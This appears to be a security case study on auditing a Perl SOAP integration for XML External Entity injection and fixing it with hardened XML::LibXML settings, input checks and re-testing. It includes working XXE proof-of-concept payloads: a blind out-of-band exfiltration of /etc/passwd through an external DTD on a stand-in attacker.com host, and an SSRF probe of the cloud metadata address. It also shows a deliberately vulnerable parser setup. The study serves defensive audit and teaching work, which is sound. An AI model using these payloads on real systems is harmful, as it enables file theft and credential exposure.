How We Audited a High-Traffic Perl Enterprise Stack on OVH and Mitigated XML External Entity (XXE) Injection in Legacy SOAP Integrations

Initial Assessment: The OVH Perl Stack and the Shadow of XXE

Our engagement began with a critical security audit of a high-traffic enterprise application hosted on OVH’s infrastructure. The core of the system was a complex Perl monolith, a testament to its longevity and the engineering effort invested over years. Interfacing with this core were several legacy SOAP integrations, a common pattern in enterprise environments where older systems need to communicate with newer services or external partners. The primary concern, flagged by an internal security scan, was the potential for XML External Entity (XXE) injection vulnerabilities within these SOAP endpoints. XXE attacks, when successful, can lead to unauthorized data disclosure, server-side request forgery (SSRF), and even denial-of-service conditions by exploiting the XML parser’s ability to process external entities.

The stack’s architecture on OVH was typical for a mature, if aging, enterprise deployment. It involved multiple web servers (such as Apache or Nginx acting as reverse proxies), a Perl application server layer, and a relational database backend (e.g., PostgreSQL or MySQL). The SOAP integrations, being older, relied on established Perl XML parsing libraries, which are susceptible to XXE unless they are configured carefully.

Deep Dive: Identifying XXE Vectors in Perl SOAP Parsers

The first technical hurdle was to pinpoint the exact XML parsing mechanisms used by the SOAP integrations. Many Perl applications use modules such as XML::LibXML (a binding to libxml2) or XML::Simple (a convenience layer that delegates to XML::Parser or a SAX parser). The vulnerability lies in how the underlying parser is configured, specifically whether it loads external DTDs and expands external entities. Depending on the versions of the module and of libxml2 in use, the default configuration can leave both enabled, which creates the attack surface.

We began by examining the codebase responsible for handling incoming SOAP requests. This involved searching for patterns related to XML parsing. A common indicator is the instantiation of an XML parser object followed by the loading of XML data. For instance, using XML::LibXML, a vulnerable pattern might look like this:

Vulnerable XML Parsing Code Snippet

use XML::LibXML;

my $parser = XML::LibXML->new();
my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# This is the vulnerable part: no options are set, so entity handling depends on
# the module's defaults, and older XML::LibXML releases expand external entities
my $dom = $parser->parse_string($xml_string);
my $root = $dom->getDocumentElement();

# ... further processing of $root ...

In this snippet, `XML::LibXML->new()` is called without options, so entity handling is left to the module's defaults, and older XML::LibXML releases expand external entities by default. An attacker can craft an XML payload containing a DOCTYPE declaration that references an external resource (e.g., a local file via `file:///` or an external URL). When the parser processes this XML, it fetches the resource and substitutes its content into the document, which can expose sensitive data or be used to initiate SSRF attacks.
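The codebase search described above can be sketched as a small script. This is a minimal illustration, not the tooling used in the audit: the pattern list, the file extensions, and the function names scan_source and scan_tree are all assumptions, and the patterns should be extended to match the codebase at hand.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use File::Find;

# Patterns that suggest XML parsing of request data (assumed list, extend as needed).
my @PATTERNS = (
    qr/\bXML::LibXML\s*->\s*new\b/,
    qr/\bXML::Simple\b/,
    qr/\bXML::Parser\b/,
    qr/\bSOAP::Lite\b/,
    qr/\b(?:parse_string|parse_file|load_xml|XMLin)\b/,
);

# Return [line_number, text] pairs for source lines matching any pattern.
sub scan_source {
    my ($source) = @_;
    my @hits;
    my $n = 0;
    for my $line (split /\n/, $source) {
        $n++;
        next if $line =~ /^\s*#/;    # skip full-line comments
        push @hits, [ $n, $line ] if grep { $line =~ $_ } @PATTERNS;
    }
    return @hits;
}

# Walk a directory tree and print hits found in Perl source files.
sub scan_tree {
    my ($root) = @_;
    find(sub {
        return unless -f $_ && /\.(?:pl|pm|cgi|t)\z/;
        open my $fh, '<', $_ or return;
        my $source = do { local $/; <$fh> };
        close $fh;
        for my $hit (scan_source($source)) {
            printf "%s:%d: %s\n", $File::Find::name, $hit->[0], $hit->[1];
        }
    }, $root);
}

# Usage: perl find_xml_parsers.pl /path/to/codebase
scan_tree($ARGV[0]) if @ARGV;
```

Each reported line is only a starting point for manual review: the options passed to the parser constructor, and whether the parsed data comes from an untrusted request, still have to be checked by hand.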

Exploitation: Crafting XXE Payloads

To confirm the vulnerability, we crafted several proof-of-concept (PoC) payloads. The goal was to demonstrate the impact of XXE, ranging from simple file disclosure to more complex SSRF scenarios.

PoC 1: Local File Disclosure

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<request>
  <data>test</data>
</request>

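And the content of evil.dtd hosted on attacker.com:

<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?d=%xxe;'>">
%wrap;
%send;

This payload attempts to read /etc/passwd and exfiltrate it out of band. The internal subset declares the parameter entity %xxe, which points at the local file, and then pulls in the external DTD. Inside that DTD, %wrap builds the declaration of a second parameter entity, %send, whose system identifier embeds the file content in a URL on the attacker’s server; referencing %send triggers the request. The indirection through an external DTD is needed because the XML specification does not allow parameter-entity references inside markup declarations in the internal subset. A blind technique like this matters for SOAP integrations, where the response rarely echoes parsed content back to the caller.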

PoC 2: Server-Side Request Forgery (SSRF)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<request>
  <data>&xxe;</data>
</request>

This payload targets the link-local instance metadata service (IMDS) address used in many cloud environments (OVH’s metadata endpoints may differ, but the principle applies). If the application server can reach this address, the response could leak instance credentials or configuration details. Even outside cloud environments, the payload demonstrates that an attacker can make the server issue arbitrary HTTP requests from its own network position.

Mitigation Strategy: Securing Perl XML Parsers

The primary mitigation for XXE in Perl XML parsers is to disable external entity resolution and DTD processing. This is achieved by passing specific options when creating the parser instance.

Securing XML::LibXML

For XML::LibXML, the relevant parser options are expand_entities, load_ext_dtd, and no_network. Setting them explicitly avoids depending on version-specific defaults.

use XML::LibXML;

# Secure parser instantiation
my $parser = XML::LibXML->new(
    expand_entities => 0,  # Do not substitute entity references with their content
    load_ext_dtd    => 0,  # Do not load the external DTD subset
    no_network      => 1,  # Forbid network access while loading DTDs or entities
);

my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# The parser no longer resolves the external entity
eval {
    my $dom = $parser->parse_string($xml_string);
    # SOAP messages must not carry a DTD, so reject any document that has one
    die "DOCTYPE declarations are not allowed\n" if $dom->internalSubset;
    my $root = $dom->getDocumentElement();
    # ... process $root ...
};
if ($@) {
    # Handle parse errors and rejected documents
    print "XML parsing error: $@\n";
}

The expand_entities => 0 and load_ext_dtd => 0 options are critical here. With them, the parser leaves &xxe; as an unexpanded entity reference and does not read the referenced file or URL. This alone does not raise an error, so the explicit internalSubset check is what rejects documents that carry a DOCTYPE declaration. Rejecting them outright is reasonable for SOAP endpoints, because the SOAP specification forbids document type declarations in messages. The eval block catches both genuine parse errors and this rejection.

Securing XML::Simple

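If XML::Simple is in use, the situation is different: the module exposes no XXE-related options of its own and delegates parsing to XML::Parser or a SAX parser. The goal remains the same, namely to prevent that underlying parser from fetching external DTDs or entities.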

use XML::Simple;

my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# XML::Simple has no equivalent of XML::LibXML's no_network option. It delegates
# parsing to XML::Parser or an installed SAX parser, so entity handling depends
# on whichever backend ends up being selected.
#
# If XML::Simple cannot be avoided, one strategy is a wrapper that rejects input
# containing a DOCTYPE declaration before it reaches XMLin. The recommended path
# is to migrate security-sensitive parsing to XML::LibXML with secure options.

# The constructor takes name => value pairs; none of them mitigates XXE,
# so this call is shown for illustration only.
my $xml_parser = XML::Simple->new();

eval {
    my $data = $xml_parser->XMLin($xml_string);
    # ... process $data ...
};
if ($@) {
    print "XML parsing error: $@\n";
}

It’s important to note that XML::Simple is often discouraged for security-sensitive applications due to its less granular control over parsing options and its tendency to “simplify” XML in ways that can obscure security issues. When dealing with untrusted XML input, XML::LibXML with explicit security configurations is the preferred choice.
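The input-sanitizing wrapper mentioned above can be sketched in core Perl. This is a hedged illustration rather than the code deployed in the audit: the function names dtd_reject_reason and assert_no_dtd are hypothetical, and the check assumes the endpoint only needs to accept UTF-8 (or ASCII-compatible) request bodies. It is deliberately coarse, rejecting a DOCTYPE string even inside a comment or CDATA section, and it complements secure parser options rather than replacing them.

```perl
use strict;
use warnings;

# Return a short reason string if the raw request body should be rejected
# before parsing, or undef if it passes this coarse pre-check.
sub dtd_reject_reason {
    my ($xml) = @_;

    # NUL bytes suggest UTF-16/UTF-32 input, which would hide "<!DOCTYPE"
    # from the byte-oriented pattern below.
    return 'NUL byte (possible UTF-16/UTF-32 input)' if $xml =~ /\x00/;

    # Accept only an absent or UTF-8 encoding in the XML declaration.
    if ($xml =~ /\A(?:\xEF\xBB\xBF)?\s*<\?xml[^>]*\bencoding\s*=\s*["']([^"']+)["']/i) {
        my $encoding = lc $1;
        return "unexpected encoding '$encoding'" unless $encoding eq 'utf-8';
    }

    # SOAP messages have no legitimate use for DTDs or entity declarations.
    return 'DOCTYPE or ENTITY declaration'
        if $xml =~ /<!\s*(?:DOCTYPE|ENTITY)\b/i;

    return undef;
}

# Hypothetical wrapper: die before the document reaches XMLin or any parser.
sub assert_no_dtd {
    my ($xml) = @_;
    my $reason = dtd_reject_reason($xml);
    die "Rejected XML input: $reason\n" if defined $reason;
    return $xml;
}
```

A call site would then look like `my $data = $xml_parser->XMLin(assert_no_dtd($xml_string));` inside the existing eval block, so that a rejected document is handled the same way as a parse error.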

Deployment and Verification on OVH

The mitigation involved a phased rollout. First, we identified all SOAP endpoints that processed XML input. For each, we reviewed the Perl code to determine the XML parsing library and its configuration. Then, we applied the secure parser instantiation patterns described above.

The deployment was performed on OVH’s staging environment first. We then re-ran our suite of XXE exploitation tools and manual tests against the patched endpoints. Verification steps included:

Attempting to read sensitive local files (e.g., /etc/passwd, application configuration files).
Attempting to trigger SSRF by pointing to internal OVH metadata services or common cloud IMDS endpoints.
Sending XML with external entity declarations and verifying that the parser either left them unresolved or rejected the document, rather than fetching external content.

For verification, we monitored application logs for any parsing errors that indicated an attempted XXE attack. We also used network monitoring tools (e.g., tcpdump on the server or firewall logs) to ensure no outbound connections were made to attacker-controlled servers or sensitive internal IPs during our tests.
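A re-test of a patched endpoint along these lines can be sketched with the core HTTP::Tiny module. The sketch makes several assumptions: the endpoint URL is supplied on the command line, the request body mirrors the simplified payload shown earlier rather than a full SOAP envelope, and the helper names build_probe and leaks_passwd are hypothetical. It only detects in-band leakage, so it does not replace the network monitoring described above.

```perl
use strict;
use warnings;
use HTTP::Tiny;

# Build a request body whose DTD declares an external entity pointing at $uri.
sub build_probe {
    my ($uri) = @_;
    return <<"XML";
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "$uri"> ]>
<request>
    <data>&xxe;</data>
</request>
XML
}

# Heuristic: does a response body look like it contains /etc/passwd content?
sub leaks_passwd {
    my ($body) = @_;
    return $body =~ /^root:[^:\n]*:0:0:/m ? 1 : 0;
}

# Runs only when a staging endpoint URL is passed as the first argument.
if (my $endpoint = $ARGV[0]) {
    my $res = HTTP::Tiny->new(timeout => 10)->post($endpoint, {
        headers => { 'Content-Type' => 'text/xml; charset=utf-8' },
        content => build_probe('file:///etc/passwd'),
    });
    my $leaked = leaks_passwd($res->{content} // '');
    printf "%s: HTTP %s, %s\n", $endpoint, $res->{status},
        $leaked ? 'LEAK DETECTED' : 'no passwd content in response';
    exit($leaked ? 1 : 0);
}
```

The non-zero exit status on a detected leak lets the script act as a regression check in a deployment pipeline, provided it is only ever pointed at systems the team is authorized to test.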

Broader Security Posture and Recommendations

While mitigating XXE in the SOAP integrations was a critical step, this audit also highlighted broader security considerations for the Perl enterprise stack:

Dependency Management: Regularly audit and update all Perl modules. Vulnerabilities in XML parsers or other libraries can be a backdoor. Pinning versions in a cpanfile installed with cpanm, combined with a vulnerability scanner for Perl modules such as CPAN::Audit, makes this repeatable.
Input Validation: Beyond XML parsing, all external inputs (HTTP parameters, file uploads, etc.) must be rigorously validated and sanitized.
Least Privilege: Ensure the application runs with the minimum necessary privileges on the OVH infrastructure. This limits the impact of any successful exploit, including XXE.
Web Application Firewall (WAF): While not a silver bullet, a WAF can provide an additional layer of defense by blocking known malicious XML patterns. However, it should not be relied upon as the sole defense against XXE.
Code Modernization: For critical and high-traffic components, consider migrating away from older, potentially vulnerable libraries or even refactoring parts of the monolith to more modern, actively maintained languages or frameworks with better built-in security features.

By systematically identifying the vulnerable parsing patterns, crafting targeted exploits, and implementing precise, configuration-based mitigations within the Perl code, we successfully addressed the XXE risk. This case study underscores the importance of deep code review and understanding the security implications of library configurations, especially in legacy systems.